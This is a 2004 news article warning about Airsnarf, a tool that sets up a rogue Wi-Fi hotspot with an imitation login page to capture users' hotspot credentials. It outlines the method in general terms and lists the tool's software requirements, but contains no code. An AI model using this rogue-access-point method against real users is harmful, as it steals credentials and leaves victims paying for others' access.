Watch out! That's not a real hotspot!

by Guy Kewney | posted on 19 May 2004

You're in a public hotspot, and logging onto the Internet. ID and password? Sure. Connected! Well, yes, but that's not all. You may have logged onto an Airsnarf box, which is busily faking the connection, and meanwhile, stealing all your details.

Guy Kewney

And the danger is: this is a very attractive exploit to juvenile hackers because, potentially, it would allow several users to share a single expensive subscription.

The Airsnarf exploit is in most respects identical to an ordinary access point. But it is a private one. It belongs to a hacker; and it logs onto the public AP as if it were an ordinary client. Then it puts up an imitation login that looks just like the public one. And while it does a wonderful job at passing on all your Web packets, and sending the replies back to you, it also keeps track of all the data it handles.

"Airsnarf was developed and released to demonstrate an inherent vulnerability of public 802.11b hotspots - snarfing usernames and passwords by confusing users with DNS and HTTP redirects from a competing access point," says the instigator, at The Shmoo Group

It's effectively using the techniques of network address translation (NAT) to fool the real hotspot into thinking that several other subscribers are all one. "Basically, it's just a shell script that uses open source software to create a competing hotspot complete with a captive portal."

Well, as a risk, it would initially look to be quite a low one. It allows the snarfer to collect email IDs and logins, or other passwords for other Internet services; but it takes quite a lot of work - compared to how much you can get by smuggling a trojan onto the Internet.

The typical script kiddie probably doesn't want your email login. Your email would bore a SK solid in an hour. But your credit card details might be worth sitting in a coffee bar to catch.

And of course, if a bunch of kids all want access through a high-cost (like, BT OpenZone) hotspot, all they have to do is set up a laptop to act as the rogue AP, and then they all log in through it, sharing the cost.

Here's the sweet part, for the kids: they can use your account to do the next log-in, once they have your password. One paid-for hour is all they need. After that, they can be any of the other subscribers who used the spot.

"With a setup like Airsnarf one can obviously create a 'replica website' of many popular, nationally recognised, pay to play hotspots. That's as simple as replacing the index.html file Airsnarf uses, with your own custom web page - one that still points its form field variables to the Airsnarf.cgi."

Combined with sitting at or near a real hotspot, hotspot users will associate and unknowingly give out their username and password for the hotspot provider's network. "The usernames and passwords can then be misused at will to utilise other hotspots of the same provider, possibly anywhere in the nation, leaving the original duped user to pay the bill."

If it catches on, it would discourage flat rate hotspots. They're far more vulnerable. If your subscription is snarfed, you'll spot it on the next bill - and probably, you'll be able to show that you were nowhere near most of the hotspots you appeared to use. But if you have a flat rate subscription, you may never spot it, unless the hotspot provider creates a "single login" policy.

Then, you won't be able to get on ever again ...

According to the creator, Airsnarf "has been tested with" (i.e. probably requires) the following:

Red Hat Linux 9.0 kernel-2.4.20-13.9.HOSTAP.i686.rpm iptables - Red Hat 9.0 CD 1

httpd - Red Hat 9.0 CD 1

dhcp - Red Hat 9.0 CD 2

sendmail - Red Hat 9.0 CD 1 Net::DNS Perl module

But if the exploit proves popular, it won't be long before a version is available for pocket terminals - iPaqs and so on - which would be very, very hard for the typical budget hotspot provider to spot.

You can discuss this article on our discussion board.